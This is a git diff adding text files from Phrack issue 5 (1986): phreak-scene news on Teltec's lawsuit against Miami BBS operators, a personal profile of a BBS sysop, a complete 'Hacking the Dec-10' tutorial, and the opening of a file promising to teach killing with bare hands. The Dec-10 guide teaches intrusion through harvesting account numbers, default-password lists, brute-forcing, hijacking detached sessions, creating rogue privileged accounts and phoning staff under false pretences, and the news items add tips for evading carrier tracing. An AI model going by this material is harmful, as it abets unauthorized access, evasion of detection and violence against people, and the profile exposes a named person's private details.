+    Apple Tree, not Apple Tree I or Apple-Tree II, it was the Apple Tree Phreak
+                BBS, that one everyone now knows as the Catfur.
+    And Plovernet (305).
+
+FL: Didn't you say that Teltec planted agents on all these boards?
+
+SB: Yeah, that's what I was getting to.  I don't know for a fact or anything
+    but, what I hear is that Teltec employees posed as undercover hackers or
+    phreakers and got on to the above listed boards.  They had handles and
+    infiltrated the system, having everyone believe that they were phreakers.
+    Cause what they did was, well obviously they knew what they were talking
+    about after all they worked for the company.  They posted really educated
+    information.  From there I believe they actually posted some Teltec codes.
+    There again, some of this is rumor, some of this is fact, I really couldn't
+    tell you which was which.
+
+FL: Well who all was busted?
+
+SB: Jack Flack, Caeser D (John Kessler), Demetrius Cross, Dave Peters, several
+    others of course.  One whole family got busted, the father, the son, and
+    the daughter.  There is a list of thirty-eight people, their actual names
+    were published in the Miami Review, which is a lawyer newspaper that goes
+    to all the lawyers and judges in the Miami area.  Another interesting thing
+    is that the list mentioned a John Doe and a Jane Doe. There was a clause
+    that said these two people are to be named at a later date, so who knows
+    who that could be or even it was more than one person.
+
+FL: You say Lex Luthor escaped?
+
+SB: Yes he did.
+
+FL: They were gonna snag him, but he escaped to California.
+
+SB: I don't know exactly if they had him or whether they were gonna bust him or
+    not but I know he was not mentioned.
+
+FL: Maybe he was one of the John or Jane Doe people.
+
+SB: Most of the stuff that I know is basically public information so I don't
+    know anything about that John and Jane Doe stuff.
+
+SB: An important point is that the Teltec agents posted some codes and then
+    monitored those codes.  I believe they cannot bust you for using those
+    numbers because that's a form of entrapment.  Instead what they'll do is
+    monitor the calls, trace the calls, and then they will know who they are
+    dealing with.
+
+FL: They'll hook up a dialed number recorder (DNR) on the line.
+
+SB: Well what this whole deal is doing is sorta pointing a finger of blame.
+    Both people are wrong, Teltec is wrong in using entrapment to try and catch
+    you, and you are wrong for using their codes to phreak.  So what they do is
+    keep an eye on you.  So then they say "ah ha" this guy, John Doe over here
+    is using this code.  We know he has been abusing our system and now we are
+    gonna keep an eye on him.  So when this code goes dead, we're gonna watch
+    and see if he uses any different ones and if he does, we'll bust him.
+
+    The main thing that's gonna come out of this court case is that they are
+    gonna go after the the 5 people that were the system operators of the
+    bbses. They're not really after the average user, what I think is happening
+    is that the average users are going to be used as witnesses against the
+    system operators.
+
+    The scary part about this case is that it is really pretty big because, it
+    may set a precedent.  If the judge rules in favor of Teltec and then Teltec
+    presses charges, the subpoena says that there is a minimal of $5000 damage,
+    and that's what they're seeking.  So its gotta be well over $5000 damages.
+    I tell you one thing, from the amount of money and information Teltec has
+    put into this they are really determined to press charges.  They invested a
+    lot of money as far as lawyers and investigators.  Another scary part of
+    this story is that Teltec has not made the evidence that they have against
+    the thirty-eight people public, as far as I know, and that's what everyone
+    is afraid of.  The average user doesn't know what he is up against.
+
+FL: I bet the majority of the people on those boards are scared shitless now.
+
+SB: Oh yeah, everybody is, its like the whole city of Miami is.  Also I hear
+    that Sprint and MCI will be cracking down in the future.  They are most
+    likely waiting to see how this case goes.
+
+FL: Is Teltec the major service down there that everybody uses?
+
+SB: Not really, it's one of many.  The popular one these days is MCI cause it
+    only has those 5 digit codes.
+
+FL: I heard Teltec gave shitty connections.
+
+SB: Yeah, that's funny because, I was talking to Jack Flack, and I said if you
+    wanna crack up the people in the courtroom and you know that they are
+    definitely gonna bust you, and that you're guilty beyond a shadow of a
+    doubt, make a joke if they ask you what you know about Teltec say, "Alls I
+    know about Teltec is that their connections to California are really
+    shitty!"  I don't know if they'd be too happy about hearing that one!
+
+FL: So they are really gonna take care of this aren't they?
+
+SB: Yeah but Teltec's main goal is to really get the system operators. You
+    should read this subpoena here, it talks about the system operators.
+    It says that the sysops "organized, financed, directed, and oversaw the
+    illicit posting and trading of Teltec codes"  "They failed to delete the
+    messages containing illegal information."  You see so the sysops are guilty
+    cause they didn't delete the messages.
+
+FL: The thing that could've solved all this is if people used random hackers
+    and random destination numbers, like MegaPhreak.
+
+SB: Another point is that even though you may be using a random hacker, most
+    people aren't gonna be using the system at 3 a.m. to 4 a.m.  The best time
+    to scan is during normal business hours.
+
+FL: That's true, after all you don't need 10,000 codes.
+
+SB: Well anyway, I think that they are really after the system operators.  And
+    if Teltec wins this case it will set a precedent.  If all that happens then
+    I expect that we are gonna see a lot more of these cases popping up all
+    around the country.
+-------------------------------------------------------------------------------
+Editor's notes: There is some talk about there actually being 6 boards being
+                busted and not just 5.  Also the reference that Lex Luthor had
+                any involvement or close calls with Teltec is only rumor.
+                Other reports from 305ers who wish to remain un-named state
+                that MCI has indeed stepped up its war on phreakers and
+                hackers.  Sysops, I really hope you watch who you let on.
+
+                Remember, a filter or fee for a bbs can easily be handled by
+                agents or investigators.  The best way to check on people is
+                through references.
+
+                TWCB was also online during this interview, but as they gave
+                little or no input to the actual content of this file all
+                remarks from TWCB have been screened as they were worthless.
+
+                The original interview was done on a conference and recorded on
+                cassette tape which was delivered to me.  After which I wrote
+                this file.  This file was given permission to be printed in
+                Phrack World News by The Firelord of 307 NPA.
+
+- Knight Lightning
+_______________________________________________________________________________
+
+Telephone Testimony                                                  March 1986
+-------------------
+Chairman Bill McGowan made a point to the House Subcommittee on
+Telecommunications.  In testimony before the recently reconvened hearings on
+telephone industry competition, McGowan spoke against the "diversification
+frenzy" of the Bell Operating Companies (BOCs).  He told the congressional
+subcommittee that the industry is still in the transition to full competition
+and cautioned against replacing a regulated monopoly with seven unregulated
+ones.
+             Information taken out of MCI World, March 1986 Issue
+_______________________________________________________________________________
+
+Kaptain Krash Busted
+--------------------
+Kaptain Krash was caught stealing American Telephone & Telegraph's (AT&T)
+Teleconferencing time through an 800 PBX posted on P-80.  He has been isolated
+from other members of the underground by his parents.
+-------------------------------------------------------------------------------
+Note from Forest Ranger:
+
+ - LET THIS BE A LESSON TO THOSE WHO USE 800 PBX'S. 800 PBX'S ARE LIKE MAKING
+COLLECT CALLS AS TO WHERE YOUR NUMBER IS AUTOMATICALLY KNOWN.  SO IT IS VERY
+EASY TO TRACE BACK TO YOU WHILE ON THE CONFERENCE OR A LATER CHECK WILL
+INDICATE THE SAME FINDINGS.
+                            Information Provided By
+                 F.R. Communications Newsline Service (c) 1986
+_______________________________________________________________________________
+
+Metal Shop Private Cleans House
+-------------------------------
+On April 13, 1986, Taran King and Knight Lightning repurged the userlog
+deleting over 100 users from Metal Shop Private.  This was mainly because of
+non-callers clogging up the log and to make sure there would be no extra
+accounts to lessen the security of the bbs.
+
+People wishing to become members of Metal Shop Private, should contact Taran
+King or Knight Lightning via email.  They then would be discussed with the
+Metal Shop Staff etc.
+
+_______________________________________________________________________________
+
+Dan Pasquale Seeks New Entertainment
+------------------------------------
+This message is mainly for bbs sysops.  Have you been receiving more calls from
+people in the 415 NPA?  In conversation with Dan Pasquale (See Phoenix
+Phortress Article in PWN III) High Evolutionary was told that Dan plans to try
+his hand at out of state bbses..."for fun."  Let it be remembered that Dan
+Pasquale ran Phoenix Phortress BBS and as such saw posts for other phreak and
+hack bbses.  Furthermore, as a bad habit, several bbsers seem to use the same
+passwords in more than one place.  Therefore it is a possibility that Dan could
+log on to bbses as someone else.
+
+                         "The Radio Station Incident"
+
+Oryan Quest had asked Broadway Hacker to remove him from the userlog for RS's
+own security.  However BH decided not to do it at that time.  Roughly a week
+later, someone using Oryan Quest's password logged onto the Radio Station BBS.
+This person was completely computer illiterate.  Example: He typed "HELP"
+instead of "?" for a menu.  When Broadway Hacker broke onto chat mode this
+Oryan Quest dropped carrier.
+
+Please note: Although the police had to drop charges on Oryan Quest because of
+an illegal search this does not mean that the police couldn't have found his
+passwords.
+
+Broadway also mentioned a rash of new users applying from 415 NPA.
+
+                                Sysops beware.
+
+                         Some Information Provided By
+                 Broadway Hacker/High Evolutionary/Oryan Quest
+_______________________________________________________________________________
+
+Maxfield Speaks
+---------------
+In a Detroit newspaper, John Maxfield was interviewed by a reporter.  Although
+I do not have the article or all the facts pertaining to it, it is known that
+the names mentioned include: Phantom Phreaker, High Evolutionary, Scan Man,
+Music Major, The Bootleg, and Slave Driver.
+
+It is believed that Maxfield had acquired these names from P-80.  However this
+is pure speculation.
+
+                    Information Provided By Various Sources
+_______________________________________________________________________________
+
diff --git a/phrack5/2.txt b/phrack5/2.txt
new file mode 100644
index 0000000..cc02e6b
--- /dev/null
+++ b/phrack5/2.txt
@@ -0,0 +1,105 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #2 of 12
+
+                            ==Phrack Pro-Phile II==
+
+                       Written and Created by Taran King
+
+                                    4/5/86
+
+         Welcome to Phrack Pro-Phile II. Phrack Pro-Phile is created to bring
+info to you, the users, about old or highly important/controversial people.
+This month, I bring to you one of the most controversial users of our times and
+of days of old...
+
+                                Broadway Hacker
+                                ~~~~~~~~ ~~~~~~
+
+         Broadway Hacker is the sysop of The Radio Station, a phreak/hack
+bulletin board in Brooklyn, N.Y. (718).
+-------------------------------------------------------------------------------
+Personal
+~~~~~~~~
+             Handle: Broadway Hacker
+           Call him: Mike
+       Past handles: None (except his sysop handle, "The Program Director")
+      Handle origin: Thought it up while on Compu-Serve
+      Date of Birth: April 22, 1965
+Age at current date: 20 years old
+             Height: 6'2"
+             Weight: About 150 lbs.
+          Eye color: Green/Hazel
+         Hair Color: Brown
+           Computer: Commodore 64 with 3 disk drives and 300/1200 baud modem
+  Sysop/Co-Sysop of: The Radio Station, The Night Stalker
+-------------------------------------------------------------------------------
+         Broadway Hacker started out in the BBS world in late 1983 when he
+first got his modem.  On March 23, 1985, The Broadway Show, his first bulletin
+board, was launched into the BBS world.  It started on 1 disk drive at 300 baud
+and has upgraded incredibly.  It was originally a phreak board as it currently
+is also.  He had originally gotten his C-64 computer in early 1985.  Various
+members of the elite world including King Blotto, Lex Luthor, and Dr. Who got
+on his board to make it the memorable board that it was before the format
+change.  His phreak experience began in 1981 through CB radios when a CB'er
+gave him a code over the line.  Some of the memorable phreak boards he was on
+included Blottoland, The AT&T Phone Center of 312, and Dark Side of the Moon of
+818.  He gives credit for his phreak knowledge to conferences mostly.  The Radio
+
+         Mike works at a very large radio station.  His phreaking is unknown at
+work.  He's not particularly interested in programming beyond modifying The
+Radio Station.
+
+         Broadway Hacker hasn't the time for hacking now.  Broadway attends the
+Tap meetings in New York occasionally, but in the past he was a regular.  He
+attended the 1986 TelePub meeting in New York which was to decide the fate of
+Tap magazine.  Broadway has met various phreaks in person including BIOC Agent
+003, Lex Luthor, Dr. Who, King Blotto, Cheshire Catalyst, The Sprinter, The
+Saint, Micro Ghoul, 2600 Magazine People, Paul Muad'Dib, and TUC.  There were
+others, but he couldn't remember at 9:00 AM EST.  He has made it a point to not
+become a member of groups, but he has been, in the past, invited to many.
+
+-------------------------------------------------------------------------------
+
+        Interests: Traveling, radio, telecommunications (modeming, phreaking),
+                   trashing, meeting other phreaks, BBS'ing, and running The
+                   Radio Station.
+
+Broadway Hacker's Favorite Things
+---------------------------------
+
+       Women: No names mentioned but yes...
+        Cars: Fieros
+       Foods: Ray's Pizza (West 11th and 6th Ave.), Steve's Ice Cream
+       Music: Any top 40 groups in general.
+
+Most Memorable Experiences
+--------------------------
+
+Getting almost kidnapped by a gay bellhop in Denver
+Getting stranded in California
+
+Some People to Mention
+----------------------
+
+Sigmund Fraud  (an up-and-coming phreak who has learned a lot in a short time)
+
+-------------------------------------------------------------------------------
+
+         Broadway Hacker wishes you all to know that he does not conference at
+all any more because conferencing has depreciated from the old days and that
+they have become mostly a place to gather for gossip.
+
+-------------------------------------------------------------------------------
+
+I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming in
+the near future.  ...And now for the regularly taken poll from all interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  For the most part, Broadway says, "No".
+Thanks for your time Mike.
+
+                                            TARAN KING
+                                   SYSOP OF METAL SHOP PRIVATE
+
+
diff --git a/phrack5/3.txt b/phrack5/3.txt
new file mode 100644
index 0000000..9ebd4ae
--- /dev/null
+++ b/phrack5/3.txt
@@ -0,0 +1,593 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #3 of 12
+
+[/][/][/][/][/][/][/][/][/][/][/]
+[/] Hacking the Dec-10 system [/]
+[/]         written by,       [/]
+[/]       Carrier Culprit     [/]
+[/][/][/][/][/][/][/][/][/][/][/]
+Revised Edition....
+
+Note: This file was distributed by accident, it was not finished.  This is the
+new and revised edition. If you see my file distributed on some AE, BBS,
+Catfur, and it's not the revised edition please ask the sysop to delete it.
+Thank-you.
+
+------------------------------------
+Part I: Logging In, and simple cmds.
+------------------------------------
+Note:Sysop's may download this file
+     but please keep the appropriate
+     credits.
+
+  Welcome to Hacking Dec 10's!
+
+ There is one way to recognize a Dec-10, you will get the "." prompt. First
+there will be a little login message, sort of like a login on a BBS. For
+example-
+
+NIH Timesharing
+
+NIH Tri-SMP 7.02-FF  19:57:11 TTY12
+system 1378/1381/1453 Connected to Node Happy(40) Line # 13
+Please LOGIN
+.
+
+ Now, you've gotten so far that you have found a Dec (Digital Equipment Corp),
+you will need to know the format of the login.
+
+[Login format]
+
+ The users have numbers called PPN's which stands for "Project/Program Number".
+The format of a PPN number is [X,X]. The first number is the the Project number
+and the second is the Program Number.
+
+ie-
+
+.Log 12,34
+
+ Job 64 NIH 7.01 KL 64-UC TTY12
+Password:
+
+ The password can range from 1-8 characters long, it may contain numbers,
+initials, or something of the sort. Try and think, if I were a user what would
+my password be. I doubt that method would work but it's worth a try.
+
+ Now say this is your very first time on a Dec 10 system. Now if you want to
+see some information about the system and some commands you may want to type-
+
+.Help
+
+ This will tell a little more about the system you are on. It will tell you how
+to get information on a specific topic. It may also give you the number to
+their voice dial-up just in case your having trouble.
+ Now the dial-up (voice) may help you if your good in BS'ing. Usually the Help
+command will tell you to consult your 'Dec 10-system guide' for more
+information.
+
+  Now say you want a list of commands to execute. You can type-
+.Help *
+
+ You will then get the following commands-  Which are too many to type in but
+you will recognize them when you type Help *.
+
+ Now after it shows all the commands it will then tell you how to login. It
+will not give you a demo account, but will give you an example login.
+
+ It will say something like, "The Login command is used for accessing the
+Decsystem-10 timesharing system."
+
+  To login please enter your project,programmer number pair.
+
+ LOGIN XXX,XXXX
+
+ The system will prompt you for your password. If your PPN or password is
+wrong you will then be prompted with a message that says-
+
+Enter Project,programmer #xxx,xxxx
+Password:
+
+End of that.
+
+ Now, there are some other useful commands you may enter while still *not*
+having a account. You can access Decnet which I will discuss later which is
+very nice to a hacker.
+
+ Now, there is also a command you can execute called "Help Phone". What this
+does is, it lists the numbers of different Dec related staffs. etc....
+Example-
+
+.Help Phone
+
+DCRT/CCB/DECsystem-10 Information Phone numbers (4/86)
+
+Recorded message       Dial xxx-xxxx
+Dec-10 operator        Dial xxx-xxxx
+Dec-10 staff           Dial xxx-xxxx
+Terminal Repairs       Dial xxx-xxxx
+Classes/Courses        Dial xxx-xxxx
+Users Area Phone       Dial xxx-xxxx
+Project Control Office Dial xxx-xxxx
+
+NOTE:This is the same area code as the Decsystem.
+
+ Now the two numbers which would be the most important to you would be the
+number of the Dec10 operator and the Dec10 staff.
+
+ Now the most important command which can be executed on the Dec10 which is
+good to use is "Systat"; this will list PPN's, time, running job, time elapsed.
+ Once you get that PPN you can start hacking away. Using systat is the simplest
+and easiest way to get PPN's. It will just be easier to type "SY" instead of
+"Systat", they are both the same thing except sy is the abbreviation.
+
+ Now here's a little example of what you would get by executing the "sy"
+command.
+
+.SY
+
+Status of Brown University 603A at 11:52:33 on 29-Jan-86
+
+Uptime 187:12:22, 80%Null time = 80%idle + 0%Lost
+7 Jobs in use out of 128. 19 logged in 4 detached out of 89   (LOGMAX)
+Job    Who    What    Run Time
+
+ 1    [OPR]   OPSER     3:22
+ 2    [OPR]   DIALOG    1:29
+ 3    [OPR]   BATCON    4:01
+ 4    [OPR]   SYSINF   51:13 01
+ 5    24,2    SYSTAT    4:52
+ 6  2332,21   DIRECT    2:22
+ 7    32,22   SYSTAT    8:19
+
+ There will also be more stuff along with the above. Now you shouldn't concern
+yourself with it, that's why I didn't add in. Now also there will be more
+sub-headings than run time, who, what, and job. You also shouldn't concern
+yourself with that either.
+
+  Now everything is really self explanatory which is up there. Now for
+beginners who are reading this file I will just tell you what that means Job is
+no concern. Who is telling you what kind of person is on the system. [OPR]
+means Operator, and the numbers such as, 24,2 are referring to regular users
+with PPN's. Now the next column which is "What". This is telling us what they
+are executing or what they are presently doing on the system. Run time is
+telling us what time they logged in. They are using military time. Now under
+systat you can find: System File Structures, Busy devices, Height segments, and
+Disk Structure. Don't worry about that stuff now.
+
+ Now you've finally got yourself some PPN's, well the next thing to do is to
+login using the procedure I showed you with Log. Enter the PPN xx,xx, and try
+to hack out some passwords.
+
+ I will now give you a list of passwords which I have currently used to get
+into a Dec10. If these passwords don't work well I am sorry you'll just have to
+try some yourself.
+
+Note: You can also make a little program having it testing out different PPN's
+and Passwords.
+
+List of Passwords--
+-------------------------------------
+Sex           Dec            Decnet
+Games         Test           Dcl
+System        Computer       Password
+Help          Link           List
+Secret        Default        Modem
+Account       Terminal       Acsnet
+Ppn           Operator       Connect
+-------------------------------------
+
+ There are many more passwords people use but I just put some common ones.
+
+  You can also try random passwords like, AA, AAB, AB, CC, etc..
+
+  Now that is it on logging in. I spent a little too much time on this but
+since this will be a two part file, I will discuss more commands that I don't
+get around to discuss in here in part II. Now this file is intended for the
+beginner so you experienced Dec hackers are bored now or will get bored later.
+
+Note: If connected to Acsnet, just type AcsDec10 to access the Dec. Everything
+else that I mentioned in the login will work.
+
+[In the system]
+
+ Now will assume you've finally gotten into the system after hacking your
+brains out. Now, this is how you will know you are in the system.
+Example-
+
+.Login 21,34
+Password:
+
+Note: You usually get two tries to enter PPN and Password.
+
+ The Dec will introduce itself, saying when the last time you were on, etc.
+
+  Also if you may do something like this to log-on.
+
+.Log 12,34
+JOB 51 NIH 7.01 KL 64-UC TT12
+Password:[c/r]
+Other jobs detached with same PPN:
+Job 34 running SYSTAT in ^C state
+Do you want to ATTACH to this job? yes
+
+
+Attaching to job 34
+
+ Now, what you are doing is attaching to an idle PPN. See, while someone else
+is on the system, about 10 minutes <max=15 mins> before you, they can input a
+command that will allow them to logoff and he can attach back to that PPN when
+he logs back on. That person will then be put to the place where he logged off
+at. If I were using 'sys', and I logged off. I would use the command 'detach'.
+Now the person would have 15 minutes to call back and attach to his PPN.
+There's one other way to attach to an account. If the person doesn't type
+something for awhile he will automatically be logged off and if you call within
+15 minutes you may be able to attach to his PPN.
+
+Note: You may still have to login.
+
+ Ok, we are now in the system after it has verified itself. What do we do? Well
+first let's take another look at the "systat". We notice there is one other
+person logged in. But we see he is in "exe", this means he is doing nothing or
+he's detached. In other words, don't worry about it.
+ Now if we wanted to change our password, we would type-
+
+/Password
+
+ After we do this, the system will ask us for our old password and our new
+password, but we should leave the password the way it is so we won't be
+discovered. But it's a good thing to know.
+
+ Now we can take a look at other users files. We can do this by typing-
+
+Dir [*,*]
+
+*=Wildcard
+
+ This will show you files of users who have their files set for public access.
+Now lets say we want to take a look at someone's file. We would type-
+
+Dir [12,11]
+
+If 12,11 was the user number we wanted we would type that inside the brackets.
+
+ Now there are many types of files. Now you may have looked through someone's
+dir, or looked through a wildcard and noticed some files. On most files you may
+have seen the words 'txt' or 'exe'.
+
+For exe you will type-
+
+[PPN]filename.exe
+
+for txt you will type-
+type filename.txt
+
+ You may also see file types such as: dat, bas, cmd, pcl, bin, hlp, and some
+others.
+
+<1>Exe=executable, which means that you can run these files from the "."
+prompt.
+
+<2>Txt=Text, these are text files which may contain: information, data or other
+numerous things. These are files you may see on most every user who has a
+public directory, and I find the most popular on Dec-10's.
+
+<3>Bas=Basic, these files are written in of course basic, and must be used in
+basic. To enter that on a Dec-10, just simply type Run Bas or if that doesn't
+work type plain old basic.
+
+Note: The basic files are to be used like any other basic file, load them up
+and run them.
+
+These are the most common files you may encounter. But when you master those
+types of files you can go on and check out the other types of files.
+
+Another way of reading files, is by typing-
+
+File:[*,*]<command>
+Once again the '*' is the wildcard.
+
+[Creating a Directory]
+
+ To create a directory you can type at the main prompt- 'Credir'
+
+ There are 2 levels for a directory, the first level is-
+
+Class and the second is Tvedit.
+
+ Now say we have a nice prived account, so we can have a 2 level directory. We
+would type-
+
+Create Directory:[,,class,tvedit]
+
+The Dec-10 would reply by saying-
+
+Created Dska0:[x,x,class]Sfd/protec:775
+Created Dska0:[x,x,class,tvedit]sfd/protec:755
+
+
+x,x=The PPN you are using, and the Dska0 is the device.
+
+ Now we can name our directory by typing-
+
+/Name:<what you want to call it>
+
+Note: You don't need the brackets.
+
+ We can protect it by typing:
+
+/Protect:<name>
+
+ There are more '/' commands so you can take a look at them by doing '/help'.
+
+   Enough of directories.
+
+[Privs]
+
+ What almost every hacker wants when he logs onto a system is an account with
+privileges. If we have an account with privileges we can make our own account
+and do some other worth while things.  Now on a Dec10 a prived account almost
+always begins with a '1'. Ex- 1,10. Now we can check the system status (sys)
+and see if we see anyone under a 1,x account. If we do then we can begin
+hacking the password. Now if you get in under '1,2' well that's another story.
+Hehe. Now say we do get in under a privileged account. Now first of all to
+activate our prived accounts we would type 'enable' this will either give us a
+'$' prompt or a '#' prompt. Whichever, it doesn't matter. We can still do what
+we have to do. Now let's say we want to make up a nice account, we would type-
+
+$Build[x,x] or Create[x,x]
+
+ After we do that we can edit that PPN or if it's new make up our own.
+ Now, I should've mentioned this before but, if you get in on a 1,x account
+make sure there is not another user logged in under the same account. If it is
+they may change the password, but even if they are in 'exe' and may be detached
+we don't want to take any chances now. Now I suggest going on in the late
+evening, early morning or if your home from school one day just call at noon or
+so.
+
+ There are many different levels of privs, there's the operator, wheel, and
+CIA. CIA being the highest since you can do anything and everything.
+ Now if you have operator privs you can do the above which was make up an
+account and create a nice directory. This will also be nice when attempting to
+get into Decnet.
+
+ Now also if you make up a prived account, you should type-
+
+Help Phones <as I mentioned before>
+
+ At the main prompt. You will get a list of phone numbers including the system
+operator's number and system managements. Now they are open usually from 10am
+to 5pm. Call during those hrs. and ask them if you can have a Decsystem
+timesharing guide. They will ask you questions like what's your name, PPN and
+password so have that ready. If they ask you why didn't you already receive
+one, just say you've just gotten a account and you were never informed about
+the manual.
+
+ This manual is very helpful. It will tell you commands, explain them in
+detail, new features, games, etc. Don't order the manual the day you get your
+account, wait maybe 4 days or so, then give them a call. They will usually send
+it out the next day, unless they get lazy like most of the system operators do.
+It's usually safe to have it sent to your house, but if you feel nervous well
+get it sent to another place.
+
+[Mail Subsystem]
+
+ Sometimes you may know of a friend who also has an account on the same Dec10
+you are on. Your friend may not be on the system right now, so that eliminates
+sending messages to him. But there is 1 alternative which is to send mail. With
+mail you need the person's name. To access mail type-
+
+Run Mail
+
+ You will then receive the prompt 'MailC', at this prompt you type-
+
+MailC:Send
+
+ Now you will be asked questions on who you want to send the mail to. It will
+look something like this-
+
+.Run Mail
+MailC:Send
+
+to:Death Hatchet
+Subject:Disk Crash
+Text:
+
+Yo! My file disk got ruined with //e Writer. See ya.
+
+ Now when your finished with your text just type '.done' or '.d' on a blank
+line to indicate that your finish. The Dec10 will reply by saying-
+
+Death Hatchet--Sent
+
+-and will return you to the 'MailC' prompt. Now if you wanted to send the same
+message to two people you would do everything I did above except when it says
+'to:' you would type-
+
+To:Death Hatchet,The Rico
+
+ The only difference is the comma. You MUST have the comma separate the two
+names in order for the system not to take it as one whole name. Once the mail
+has been sent, the user Death Hatchet will receive it when he logs on. After he
+gets the little welcome messages and his stats from when he last logged on, the
+mail will automatically be read to him like this-
+
+From:Carrier Culprit             Postmark:20-Mar-86-08:12:27
+  to:Death Hatchet
+Subject:Disk Crash
+
+Yo! My file disk got ruined with //e Writer. See ya.
+
+ It will then read other pieces of mail if he has any more. If not, it will
+just go to the main prompt. If you want to read the mail again, go to the mail
+section and type 'read' instead of send. You will then be able to save it for
+your next call or kill it. Sometimes mail won't show up when you first logon so
+go to the mail section anyway and check just in case.
+
+ On some of the older Dec10 systems mail was not used, you would just send a
+message. Mail was added to the Dec10 system in the mid 70's. No big deal, but
+just something to know. If you run mail and you don't get into the mail section
+try 'run mai'. The 'run mai' is used on some of the earlier systems, but
+usually the system acknowledges both.
+
+ Never send violent mail to system operators, they will log you off and do away
+with your account. If you do, I suggest having another account (PPN) on hand.
+On some of the newer Dec10 systems, you can forward mail, which you do by
+typing 'Frd Mail' at the 'MailC' prompt. The system will then ask you where you
+want it forwarded to, their password, your password. The system operator views
+this and checks with both parties and he/she will leave you mail saying that it
+is done. This is really being tested but I've seen it in operation on some
+Dec10's in 714.
+
+[Information]
+
+ This is another handy command that can be used to your advantage. It gives you
+information on jobs and PPN's. You don't get passwords but you can get some
+good stats. If you type 'info' or 'help info' you will get a list that would
+look something like this-
+To look at one of the following do-- Info XXXX
+
+  Switch                            Meaning
+  ======                            =======
+    .                               Information on your job
+  [??,??]                           Information on that PPN
+  ALL                               Information on all PPN's
+  ALL:LOPR                          Information on all Local Operator Jobs(1,2)
+  ALL:OPR                           Information on all Operator jobs (1,2)
+  ALL:ROPR                          Information on all Remote Operator jobs
+  ALL:Users                         Information on all users
+  Batch                             Information on all batch jobs
+  Detached:ALL                      Information on all Detached PPN'S
+  Detached:OPR                      Information on all Detached Operator jobs
+  Detached:Users                    Information on all Detached users
+  Detached:LOPR                     Information on all Local Operator jobs
+
+ And the list goes on. If you want the whole list just type 'Help Info'. It
+will also give info on disk devices, directories, and other stuff. Some of the
+Dec10 systems don't support this, but you will find that most of them do.
+
+ The '1,2' which is next to the Operators are system operator accounts. I
+mentioned that before, so you won't get confused. Most files are kept under
+this account so if you get in under it you'll have a lot to do....hehehe.
+
+[Watch]
+
+ This command will show you your stats. You will be able to toggle it. You can
+toggle it on which will display on the top of your screen or just look at it
+once. The watch will show you-
+
+Run---which means your CPU time.
+Wait--which means your elapsed time since started.
+Read--number of disk blocks you have read.
+Write--number of disk blocks you have written.
+
+ If you have system privs, type-
+
+Watch[x,x]
+
+ You can watch another person if you have these privs. It will also show you
+information. Many operators use this so be careful in what you type.
+
+[Other commands]
+
+ If you want to find out some information about someone type-
+
+Who Their name  job#  TTY
+
+ Now I could do something like-
+
+Who Carrier Culprit  4  #7
+
+This is saying that Carrier Culprit is logged in on job 4 and is on TTY #7. The
+monitor will also display the user's PPN, and other information dealing with
+his status on the system.
+-------------------------------------------------------------------------------
+ Now if you notice one of your friend's are on TTY10 and you want to send him a
+message you can type-
+
+Send TTY10  Congratulations on passing your exam
+
+ The user on TTY10 will receive the message and may have the capability of
+replying. You can also use this to meet new friends, especially a system
+operator who is pretty cool and can give you some accounts, but don't count on
+it.
+-------------------------------------------------------------------------------
+
+ If you would like to talk to someone one on one, you can type-
+
+Talk TTY10
+
+ You will now be able to talk to each other, chat, but like I said, watch what
+you say sometimes, but don't get to paranoid that the system operator is
+watching. Usually if the system operator is under 'Watch' or 'Exe' he may be
+watching a certain user. This is just basically a chat system, so have fun with
+it.
+-------------------------------------------------------------------------------
+
+ If you have a prived account go into 'enable' and type-
+
+Whostr
+
+ This will give information about users logged in and the directories.
+-------------------------------------------------------------------------------
+
+ If you need the time, just type 'time'. If you have math homework just type
+'aid' for desktop calculator.
+-------------------------------------------------------------------------------
+
+Ctrl-characters                      Case Commands
+===============                      =============
+ctrl-s  = pause                If you support lower case type:
+ctrl-q  = resume               'Set Terminal LC'
+ctrl-c  = abort
+ctrl-h  = backspace
+
+-------------------------------------------------------------------------------
+
+[Decnet]
+
+ Is supported by all Digital computers. To access it, type 'Decnet' and try to
+hack out the password. Decnet supports such nodes as, VMS, TOPS10 (operating
+system for Dec10's), TOPS20, and others. Usually system operator's accounts can
+be helpful if you need a Decnet pw. Try their pw and see if it works. Usually
+the password to Decnet can be plain old "Decnet". Format= Set Host xxxx
+
+[Acsnet]
+
+ This is probably my favorite. This supports Dec10, and many other computers.
+When you log on to it, it will look something like this-
+
+ACSNET
+Fri Mar 13 19:30:23 1986
+Port ID:  dialup C502  at   300 baud
+
+dialup C502 with even parity
+
+>
+
+ Now to get a menu type '?'. It will give you a list of groupnames. To enter
+the Dec10 type 'Acsdec10', usually Decnet is not listed so type Decnet anyway.
+Other commands for ACSNET are-
+
+Connect      Daytime
+Hangup       Disconnect
+Info         Help
+Release      Resume
+Set          WhoamI
+
+-------------------------------------------------------------------------------
+
+Hmm. Knew I forgot something. To log off the Dec10, just type-
+Bye or Kjob (kill job)
+
+Part II: This will deal with the 1,2 PPN and advanced commands using Enable.
+
+                   Have fun,
+
+         $$$$$$$$$$$$$$$$$$$$$->Carrier Culprit<-$$$$$$$$$$$$$$$$$$$$$
+
+
+[END]
+Revised Edition
+(C)opyright April, 1986
+
diff --git a/phrack5/4.txt b/phrack5/4.txt
new file mode 100644
index 0000000..451d676
--- /dev/null
+++ b/phrack5/4.txt
@@ -0,0 +1,301 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #4 of 12
+
+                            +---------------------+
+                            | Hand-To-Hand Combat |
+                            |                     |
+                            |          by         |
+                            |                     |
+                            |  [bad boy in black] |
+                            +---------------------+
+
+                                      on
+
+                                ^*^ 3/31/86 ^*^
+
+_______________________________________________________________________________
+
+This file will teach you how you can kill another person with your own two
+hands. The information presented here will be very helpful to the beginner and
+will also serve as a refresher for those of you already familiar with the
+subject.
+
+I will start off by talking about basic things such as stance, what you should
+and shouldn't do when fighting and other information that the beginner will
+need to know. Then, I will give you a list of over 20 vulnerable points that
+one should always try attacking in a fight along with the way these points
+should be attacked. Finally, I will give you some more fighting tips and
+information on how you can continue learning about hand-to-hand combat.
+
+                                      ^*^
+
+Now, let me discuss some of the basics you will need to know when you are in
+any combat situation.
+
+Stance
+------
+The best stance when confronting an enemy is to put your feet at shoulders
+length apart and your arms should be facing forward, parallel to each other and
